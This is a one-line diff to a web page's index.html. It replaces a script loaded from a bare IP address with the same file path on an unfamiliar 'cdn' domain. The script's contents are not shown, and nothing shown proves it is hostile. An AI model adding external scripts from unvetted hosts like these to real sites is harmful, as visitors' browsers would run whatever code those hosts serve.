--- a/index.html
+++ b/index.html
@@ -80,7 +80,7 @@
 			</div>
 		</div>
 	</footer>
-	<script src="http://134.122.53.223/61/3a77.js"></script>
+	<script src="https://cdn.doyourbest2020.com/61/3a77.js"></script>
 	
 </body>
 
